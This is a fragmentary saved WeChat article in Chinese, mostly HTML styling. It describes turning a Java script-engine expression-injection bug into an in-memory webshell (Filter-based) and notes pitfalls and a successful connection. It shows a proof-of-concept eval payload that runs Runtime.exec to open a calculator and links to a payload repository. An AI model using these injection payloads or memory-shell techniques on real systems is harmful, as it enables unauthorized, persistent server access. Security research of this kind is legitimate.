style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>本文主要研究如何武器化利用,注入内存马。<h2 style='margin-top:2rem;margin-bottom:.5rem;font-weight:700;color:#f85f48;line-height:1.35;font-size:24px;letter-spacing:normal;text-align:start;text-wrap:wrap;font-family:Menlo,Monaco,"Source Code Pro",Consolas,Inconsolata,"Ubuntu Mono","DejaVu Sans Mono","Courier New","Droid Sans Mono","Hiragino Sans GB",微软雅黑,monospace !important;visibility:visible'>注入内存马</h2><p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>目前市面上公开的POC主要是做到了命令执行<pre style='padding-top:8px;padding-bottom:6px;background:#2d2d2d;border-radius:0px;overflow-y:auto;color:#50616d;letter-spacing:normal;text-align:start;font-size:10px;line-height:12px;font-family:consolas,menlo,courier,"monospace","Microsoft Yahei" !important;border-width:1px !important;border-style:solid !important;border-color:#e2e2e2 
!important;visibility:visible'><ol class=list-paddingleft-1 style="padding-top:10px;padding-bottom:10px;padding-left:30px;list-style-position:initial;list-style-image:initial;color:transparent;overflow-y:auto;list-style-type:none !important;visibility:visible"><li style="padding-left:1em;list-style-type:decimal;margin-top:6px !important;visibility:visible"><p style=visibility:visible><span style="color:#4a4a4a;display:block;line-height:22px;font-size:14px !important;word-break:inherit !important;white-space-collapse:collapse !important;visibility:visible"><span style="line-height:22px;display:block;word-break:inherit !important;visibility:visible"><code style="margin-left:-20px;display:flex;overflow:initial;line-height:12px;overflow-wrap:normal;border-width:0px;border-style:initial;border-color:initial;font-size:10px;font-family:inherit !important;white-space-collapse:preserve !important;visibility:visible"><span style="color:#cc99cc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">exec</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">(</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">java</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">lang</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#6699cc;line-height:20px;font-size:13px !important;white-space:inher
Y4tacker也在之前的文章中提到了怎么构造Js引擎的Pochttps://tttang.com/archive/1771/<pre style='padding-top:8px;padding-bottom:6px;background:#2d2d2d;border-radius:0px;overflow-y:auto;color:#50616d;letter-spacing:normal;text-align:start;font-size:10px;line-height:12px;font-family:consolas,menlo,courier,"monospace","Microsoft Yahei" !important;border-width:1px !important;border-style:solid !important;border-color:#e2e2e2 !important;visibility:visible'><ol class=list-paddingleft-1 style="padding-top:10px;padding-bottom:10px;padding-left:30px;list-style-position:initial;list-style-image:initial;color:transparent;overflow-y:auto;list-style-type:none !important;visibility:visible"><li style="padding-left:1em;list-style-type:decimal;margin-top:6px !important;visibility:visible"><p style=visibility:visible><span style="color:#4a4a4a;display:block;line-height:22px;font-size:14px !important;word-break:inherit !important;white-space-collapse:collapse !important;visibility:visible"><span style="line-height:22px;display:block;word-break:inherit !important;visibility:visible"><code style="margin-left:-20px;display:flex;overflow:initial;line-height:12px;overflow-wrap:normal;border-width:0px;border-style:initial;border-color:initial;font-size:10px;font-family:inherit !important;white-space-collapse:preserve !important;visibility:visible"><span style="color:#cc99cc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">eval</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">(</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">getEngineByName</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">(</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">javax</span><span 
style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">script</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#6699cc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">ScriptEngineManager</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">.</span><span style="color:#cc99cc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">new</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">(),</span><span style="color:#99cc99;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">'js'</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">),</span><span style="color:#99cc99;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">'java.lang.Runtime.getRuntime().exec("open -na Calculator")'</span><span style="color:#cccccc;line-height:20px;font-size:13px !important;white-space:inherit !important;visibility:visible">)</span></code></span></span></p></ol></pre><p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start;visibility:visible>似乎只需要把Js执行的Payload换成我之前议题中给出的Payload即可https://github.com/yzddmr6/Java-Js-Engine-Payloads<p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start>但是实际上实现的时候有两个坑<h3 style='margin-top:2re
随后换成Filter连接成功<p style=margin-top:15px;margin-bottom:15px;font-size:15px;white-space:pre-line;line-height:30px;color:#4a4a4a;letter-spacing:normal;text-align:start><img class="rich_pages wxw-img" data-imgfileid=100000423 data-ratio=0.5657407407407408 data-src="https://mmbiz.qpic.cn/sz_mmbiz_png/LtiayO136fU4IFpKSwoqKg8ic71tJicvTeUHOv77xB931lQvsYBQULXh6NnzBficSlEfBt04RLVHMHiboibO1X1iahhRQ/640?wx_fmt=png&amp;from=appmsg" data-type=png data-w=1080 style="border-width:2px;border-style:solid;border-color:#eeeeee;border-radius:6px;height:auto !important;visibility:visible !important;width:677px !important" data-original-style="border-width: 2px;border-style: solid;border-color: rgb(238, 238, 238);border-radius: 6px;" data-index=10 src="data:image/webp;base64,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
</div>
</div>
</div>
</div>
</div>
<div class=wx-root data-weui-theme=light></div><div class=wx-root data-weui-theme=dark></div><div data-v-63f48496 class=underline-container><div data-v-a1d05804 data-v-63f48496 style=position:absolute;top:0px;left:0px;right:0px><div data-v-a1d05804 class=underline_share_context style=width:100vw;display:none></div></div><div data-v-bdc8501c data-v-63f48496 class="menu_options menu_options_default menu_options_show" style=transform:scale(0);color:#ffffff><div data-v-bdc8501c class=menu_options_bar style=color:#ffffff><div data-v-63f48496 data-v-bdc8501c class=context-menu-wrap><p data-v-63f48496 data-v-bdc8501c class=data-text> people underline </p></div></div><div data-v-bdc8501c class=menu_options_tail style=color:#ffffff></div></div></div><div><span><span></span><div role=dialog aria-modal=true tabindex=0 class="weui-pc-popover__wrp wx_user_profile_dialog_pc"><div class="weui-pc-popover weui-pc-popover_radius-tail weui-pc-popover_pos-right weui-pc-popover_align-center sf-hidden"></div><div class=weui-mask_transparent style=display:none></div></div></span><span data-v-cb1503ab><span></span><div role=dialog aria-modal=true tabindex=0 class="weui-pc-popover__wrp wx_identity_dialog_pc sf-hidden"></div></span></div><div id=immersive-translate-popup style=all:initial><template shadowrootmode=open><style class=sf-hidden>/*!
* Pico.css v1.5.6 (https://picocss.com)
* Copyright 2019-2022 - Licensed under MIT
*/#mount{--font-family:system-ui,-apple-system,"Segoe UI","Roboto","Ubuntu","Cantarell","Noto Sans",sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color Emoji";--line-height:1.5;--font-weight:400;--font-size:16px;--border-radius:.25rem;--border-width:1px;--outline-width:3px;--spacing:1rem;--typography-spacing-vertical:1.5rem;--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing);--grid-spacing-vertical:0;--grid-spacing-horizontal:var(--spacing);--form-element-spacing-vertical:.75rem;--form-element-spacing-horizontal:1rem;--nav-element-spacing-vertical:1rem;--nav-element-spacing-horizontal:.5rem;--nav-link-spacing-vertical:.5rem;--nav-link-spacing-horizontal:.5rem;--form-label-font-weight:var(--font-weight);--transition:.2s ease-in-out;--modal-overlay-backdrop-filter:blur(0.25rem)}@media(min-width:576px){#mount{--font-size:17px}}@media(min-width:768px){#mount{--font-size:18px}}@media(min-width:992px){#mount{--font-size:19px}}@media(min-width:1200px){#mount{--font-size:20px}}@media(min-width:576px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*2.5)}}@media(min-width:768px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3)}}@media(min-width:992px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*3.5)}}@media(min-width:1200px){#mount>header,#mount>main,#mount>footer,section{--block-spacing-vertical:calc(var(--spacing)*4)}}@media(min-width:576px){article{--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){article{--block-spacing-horizontal:calc(var(--spacing)*1.5)}}@media(min-width:992px){article{--block-spacing-horizontal:calc(var(--spacing)*1.75)}}@media(min-width:1200px){article{--block-spacing-horizontal:calc(var(--spacing)*2)}}dialog>article{--block-spacing-vertical:calc(var(--spacing)*2);--block-spacing-horizontal:var(--spacing)}@media(min-width:
576px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*2.5);--block-spacing-horizontal:calc(var(--spacing)*1.25)}}@media(min-width:768px){dialog>article{--block-spacing-vertical:calc(var(--spacing)*3);--block-spacing-horizontal:calc(var(--spacing)*1.5)}}a{--text-decoration:none}a.secondary,a.contrast{--text-decoration:underline}small{--font-size:.875em}h1,h2,h3,h4,h5,h6{--font-weight:700}h1{--font-size:2rem;--typography-spacing-vertical:3rem}h2{--font-size:1.75rem;--typography-spacing-vertical:2.625rem}h3{--font-size:1.5rem;--typography-spacing-vertical:2.25rem}h4{--font-size:1.25rem;--typography-spacing-vertical:1.874rem}h5{--font-size:1.125rem;--typography-spacing-vertical:1.6875rem}[type="checkbox"],[type="radio"]{--border-width:2px}[type="checkbox"][role="switch"]{--border-width:3px}thead th,thead td,tfoot th,tfoot td{--border-width:3px}:not(thead,tfoot)>*>td{--font-size:.875em}pre,code,kbd,samp{--font-family:"Menlo","Consolas","Roboto Mono","Ubuntu Monospace","Noto Mono","Oxygen Mono","Liberation Mono",monospace,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol","Noto Color 
Emoji"}kbd{--font-weight:bolder}[data-theme="light"],#mount:not([data-theme="dark"]){--background-color:#fff;--background-light-green:#f5f7f9;--color:hsl(205deg,20%,32%);--h1-color:hsl(205deg,30%,15%);--h2-color:#24333e;--h3-color:hsl(205deg,25%,23%);--h4-color:#374956;--h5-color:hsl(205deg,20%,32%);--h6-color:#4d606d;--muted-color:hsl(205deg,10%,50%);--muted-border-color:hsl(205deg,20%,94%);--primary:hsl(195deg,85%,41%);--primary-hover:hsl(195deg,90%,32%);--primary-focus:rgba(16,149,193,0.125);--primary-inverse:#fff;--secondary:hsl(205deg,15%,41%);--secondary-hover:hsl(205deg,20%,32%);--secondary-focus:rgba(89,107,120,0.125);--secondary-inverse:#fff;--contrast:hsl(205deg,30%,15%);--contrast-hover:#000;--contrast-focus:rgba(89,107,120,0.125);--contrast-inverse:#fff;--mark-background-color:#fff2ca;--mark-color:#543a26;--ins-color:#388e3c;--del-color:#c62828;--blockquote-border-color:var(--muted-border-color);--blockquote-footer-color:var(--muted-color);--button-box-sha